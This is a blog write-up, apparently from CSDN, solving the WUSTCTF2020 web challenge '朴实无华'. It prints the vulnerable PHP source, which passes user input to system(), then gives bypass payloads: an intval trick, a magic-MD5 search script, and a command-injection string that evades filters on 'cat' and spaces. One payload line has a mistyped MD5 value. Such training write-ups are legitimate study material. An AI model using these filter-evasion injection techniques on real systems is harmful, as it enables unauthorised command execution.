[WUSTCTF2020]朴实无华

最新推荐文章于 2024-04-15 07:55:29 发布
最新推荐文章于 2024-04-15 07:55:29 发布
阅读量1.4k 收藏 1
点赞数 2
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/106237931
版权

在这里插入图片描述
没啥提示,扫下目录
dirsearch 扫到robots.txt
在这里插入图片描述
进去看看
在这里插入图片描述
访问这个假的flag

在这里插入图片描述
扫不到其他东西了,抓个包看看
在这里插入图片描述
藏在这里头去了
看看代码


Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/fl4g.php:2) in /var/www/html/fl4g.php on line 3
<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
去非洲吧

第一关
在这里插入图片描述
在这里插入图片描述
需要他小于2020,加一后又要大于2020
那个函数在用科学计数法的时候,只会保留前面的1
加1后就会
在这里插入图片描述
所以直接传?num=1e10

在这里插入图片描述
第二关要让MD5加密后的值与本身的值相等
直接用脚本跑

def run():
    i = 0
    while True:
        text = '0e{}'.format(i)
        m = md5(text)
        print(text,m)
        if m[0:2] == '0e' :
            if m[2:].isdigit():
                print('find it:',text,":",m)
                break
        i +=1

run()

这脚本跑了我挺久的。。。。。。。

跑出来的值是0e215962017

payloadnum=1e10&md5=0e215963017

最后一关

在这里插入图片描述
相关函数如下
在这里插入图片描述
在这里插入图片描述
他过滤了cat和空格
先ls一下
在这里插入图片描述
看到那一大坨东西,flag在那了
绕过过滤参考文献

绕过空格
在这里插入图片描述
绕过cat

ca\t

payload

num=1e10&md5=0e215962017&get_flag=ca\t%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

传入得flag
在这里插入图片描述

penson by 小乌
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[WUSTCTF2020]朴实无华 1
m0_62879498的博客
05-07 1314
[WUSTCTF2020]朴实无华 1 进入环境,什么也没有得到,估计就是需要我们进行目录扫描了 用dirsearch进行把爆破扫描 环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30 我们尝试访问文件 访问 fAke_f1agggg.php 使用 bp抓包 查看情况 发现了新的文件,尝试访问 发现了朱
WUST-CTF web-朴实无华 wp
qq_42188168的博客
03-30 504
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 &am...
[网鼎杯 2020 玄武组]SSRFMe-反弹shell
2202_75361164的博客
04-09 357
- 因为用常规方法一直写不出来,所以就换了一种
web buuctf [WUSTCTF2020]朴实无华
weixin_44214568的博客
04-01 394
1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件) 访问 3.根据头部查看请求头和响应头 4.查看,打开网页里面对汉字的编译是乱码,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //...
[WUSTCTF2020]朴实无华1
qq_63169208的博客
07-02 1845
这个真的是各种绕过
WUST-CTF2020-WP
夏日 の blog
03-29 5284
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
wustctf2020_easyfast
z1r0的博客
02-10 233
wustctf2020_easyfast 查看保护 漏洞点的话出在了这里,一个uaf。 add可以四次,edit也可以改8个数据 这里还有一个比较关键,就是有一个getshell的函数,但602090是1,需要将它改为0 思路就是fastbin double free改fd到602080,原因是因为2.23下的libc会检测size是否合格。最后申请到602090,改里面的数据为0即可getshell。具体fastbin attack看z1r0’s blog from pwn import * co
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选 本文档提供了一个完整的自我介绍示例,涵盖了个人基本信息、教育背景、工作经历、职业目标、个人性格等多个方面的内容。以下是本文档中所涉及的知识点: 1. 自我介绍的基本结构:自我介绍...
note:就是一个朴实无华的笔记本
04-02
这个名为"note:就是一个朴实无华的笔记本"的压缩包文件,可能是某个开发者或学习者整理的关于特定主题——对数序列的学习资料。对数序列在数学和计算机科学中有着重要的应用,尤其是在算法分析和复杂度计算中。 ...
logseq:就是一个朴实无华的笔记本
03-29
《logseq:构建个人知识库的实用工具》 在当今信息爆炸的时代,管理和组织个人知识变得至关重要。logseq,正如其名,是一个简洁而强大的笔记本应用,专为那些寻求高效知识管理的人士设计。它以其独特的功能和灵活性...
zapp:朴实无华的用作快速建造项目的基础库
03-19
为快速建造项目的基础库 开始 app := zapp . NewApp ( "test" ) app ....扩展性 组件 我们实现了一些组件,可以在找到 服务 我们实现了一些服务,可以在找到 ...作为一个基础库,我们尽量减少了依赖包,只需要以下包依赖 ...
一个朴实无华的Java计算引擎(很实用) 【文件备份一下,以免丢失】
11-16
Java计算引擎是一种用于执行计算任务的软件框架,它利用Java编程语言的强大功能和跨平台兼容性,为开发者提供了一个高效且灵活的环境来处理各种计算问题。在这个项目中,我们看到的是一个相对简单的实现,专注于实用...
朴实无华 自成“风流”――读《南乡子・葵扇》 (2003年)
05-16
朴实无华 自成“风流”――读《南乡子・葵扇》 (2003年)
软件工程-林锐著 软件工程的观念、方法、策略和规范都是朴实无华
05-19
软件工程的观念、方法、策略和规范都是朴实无华的,平凡之人皆可领会,关键 在于运用。我们不可以把软件工程方法看成是诸葛亮的锦囊妙计─—在出了问题后才打 开看看,而应该事先掌握,预料将要出现的问题,控制每个...
软件工程思想软件工程的观念、方法、策略和规范都是朴实无华的,
05-21
《软件工程思想》讲述“软件开发”和“做程序员”的道理,视野独特,构思新颖,内容风趣,不落窠臼,令人耳目一新。堪称难得,以至回味无穷。
BUUCTF misc 专题(86)[WUSTCTF2020]爬
tt_npc的博客
05-26 454
下载附件,得到无后缀的文件,拖入winhex 发现是pdf格式的文件,加上pdf后缀打开 发现文字提示flag被盖住了,wps貌似移不开图片,换word,可以移,下面藏了个16进制图片,提取出文字:0x77637466323032307b746831735f31735f405f7064665f616e645f7930755f63616e5f7573655f70686f7430736830707d 进制转换得到flag flag{th1s_1s_@_pdf_and_y0u_ca...
云演CTF [WUSTCTF2020]爬
cadandme的博客
01-14 351
云演CTF中的一道misc题
【Web】WUSTCTF 2020 部分题解
最新发布
uuzeray的博客
04-15 354
1/**/UnIon/**/select/**/1,2,3# //回显3。改Content-Type,文件内容加个GIF89a魔数。访问/fAke_f1agggg.php。随便注册个账号,更换头像功能存在文件上传。抓包看响应头看到/f14g.php。第一反应搜CVE,但没搜到有用的。过滤了空格,测出来有sql注入点。简单的bypass,不解释了。直接读环境变量拿到flag。访问/robots.txt。访问/f14g.php。可以搜索找到上传的路径。连接蚁剑,发现权限不够。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值